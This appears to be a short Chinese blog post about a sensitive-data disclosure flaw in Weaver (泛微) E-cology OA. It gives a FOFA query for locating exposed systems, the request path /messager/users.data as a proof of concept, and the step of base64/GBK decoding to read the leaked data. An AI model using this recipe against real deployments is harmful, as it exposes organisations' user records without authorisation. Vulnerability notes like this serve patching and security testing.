JZTXT
  • 首页
  • Ai
  • Java
  • Python
  • Android
  • Mysql
  • JavaScript
  • Html
  • CSS

泛微E-cology user.data敏感信息泄露

发布时间 2023-09-04 15:57:24作者: 学安全的小白

漏洞描述

泛微OA E-cology user.data允许任意用户下载,获取OA中的敏感信息

漏洞影响

泛微OA E-cology

漏洞复现

fofa语法:app="泛微-协同商务系统"
登录页面:

POC:

/messager/users.data


base64 GBK解码即可获取OA中的敏感数据

    本栏目推荐文章
  • openpyxl模块---------------------------------------------提取身份证信息及计算年龄
  • JFinal学生信息管理系统
  • 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置,结束位置,长度等统计信息
  • 初中信息奥赛模拟测试
  • Qt/C++编写视频监控系统83-自定义悬浮条信息
  • 软件构造大作业 综合信息管理系统
  • 基于融合语义信息改进的内容推荐算法。Improved content recommendation algorithm integrating semantic information.
  • 提高人类获取信息的效率
  • 【日历】生成ics日历信息
  • UCB Data100:数据科学的原理和技巧:第十一章到第十五章
版权声明:本网站为非赢利性站点,本网站所有内容均来源于互联网相关站点自动搜索采集信息,相关链接已经注明来源。
联系我们